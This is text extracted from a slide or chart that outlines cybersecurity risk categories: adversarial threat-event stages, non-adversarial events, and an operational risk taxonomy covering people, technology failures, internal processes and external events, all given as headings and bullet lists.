Perform reconnaissance and gather information · 5 sub-elements Craft or create attack tools · 6 sub-elements Deliver/insert/install malicious capabilities · 14 sub-elements Exploit and compromise · 17 sub-elements

Non-Adversarial

• Spill sensitive information • Mishandling of critical and/or sensitive information by authorized users • Incorrect privilege settings • Communications contention • Unreadable display • Earthquake • Fire

Taxonomy of Operational Cyber Security Risks

Actions of People

Inadvertent • Mistakes • Errors • Omissions Deliberate • Fraud • Sabotage • Theft • Vandalism Systems and Technology Failures Hardware • Capacity • Performance • Maintenance • Obsolescence Systems • Design • Specifications • Integration • Complexity

Failed Internal Processes Process controls • Status monitoring • Metrics • Periodic review • Process ownership Supporting Processes • Staffing • Funding • Training and development • Procurement

External Events

Disasters • Weather event • Fire • Flood • Earthquake • Unrest • Pandemic Legal issues • Regulatory compliance • Legislation • Litigation